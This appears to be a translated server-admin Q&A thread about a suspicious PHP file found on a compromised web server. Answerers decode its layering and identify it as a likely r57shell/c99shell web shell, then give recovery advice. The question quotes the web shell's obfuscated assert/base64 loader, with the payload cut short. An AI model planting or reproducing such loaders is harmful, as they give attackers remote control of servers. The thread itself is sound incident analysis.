Arquivo misterioso no servidor - hack ou outra coisa?

Navegue suas respostas
1

Encontrei um arquivo estranho que não criamos em um de nossos diretórios.

Foi nomeado ".moreinfoege.php.KJt" No diretório também tivemos um arquivo chamado moreinfo.php

Temos tido problemas com o servidor ultimamente (ataques do WordPress, ataques DDoS), por isso estamos em alerta máximo para outras infiltrações. Isso é um hack? Quais são algumas das maneiras que poderiam ter chegado?

Veja como era seu conteúdo (uma longa cadeia sem sentido abreviada para se encaixar aqui): 

<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 [...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>
    
por Susan 22.12.2009 / 09:31

3 respostas

5

O código está escondendo o fato de que está fazendo assert(base64_decode( do texto de 'ZXZ para W =='.

A decodificação desse texto mostra outras strings que estão fazendo outra decodificação e descompactação começando com eval(gzinflate(base64_decode("5b3pe ...

Sem o código completo publicado, não consigo ver o que há no final da toca do coelho. Você pode usar este site para decodificar cada etapa:

link (NOTA: O texto vai na caixa azul.)

Este link deve ajudar na segunda parte: link

UPDATE: Com base no arquivo completo, isso parece ser uma variante do r57shell ou c99shell. Ele fornece uma interface web em seu servidor para fazer coisas como executar operações de linha de comando e interagir com dados SQL.

Este site tem um exemplo do que parece: link

Este site tem uma postagem no blog de alguém que também teve o problema: link

    
por 22.12.2009 / 12:31
4

Parece que o PHP é codificado em base64 para tornar mais difícil descobrir o que está acontecendo - mas é difícil dizer sem acesso aos dois arquivos em questão. Eu estaria disposto a apostar grandes quantidades de chocolate que seu host ainda está comprometido.

Dependendo do tipo de acesso que os invasores conseguiram obter anteriormente e de como você se recuperou, pode haver métodos de acesso deixados para trás.

Eu recomendo que você comece seu procedimento de recuperação - instalando um novo sistema operacional e restaurando seu site a partir de uma cópia válida.

    
por 22.12.2009 / 10:41
0

parece um hack. uma das formas recentemente populares de obter esse tipo de arquivo é via ftp.

há muitos cavalos de tróia capturando senhas de clientes ftp populares do Windows [por exemplo, comandante total]. as credenciais são relatadas para controlar os nós que, diretamente ou de outras máquinas infectadas, anexam código js / php malicioso ao arquivo de índice, carregam arquivos maliciosos de .htaccess, etc.

verifique a data de criação do arquivo, tente falar com seu provedor de hospedagem para obter os logs de FTP ao redor do tempo em que esse arquivo foi carregado.

para estar no lado seguro ... - se é wordpress - dados de backup e código; remova todos os arquivos php, revise todos os modelos, restaure o aplicativo da versão atualizada.

    
por 22.12.2009 / 10:35

Tags

Criando um site simples e sem frescuras com o mínimo de dor de cabeça [fechado] Por que / Quando ter um servidor de mídia separado para imagens, mp3s, flvs etc?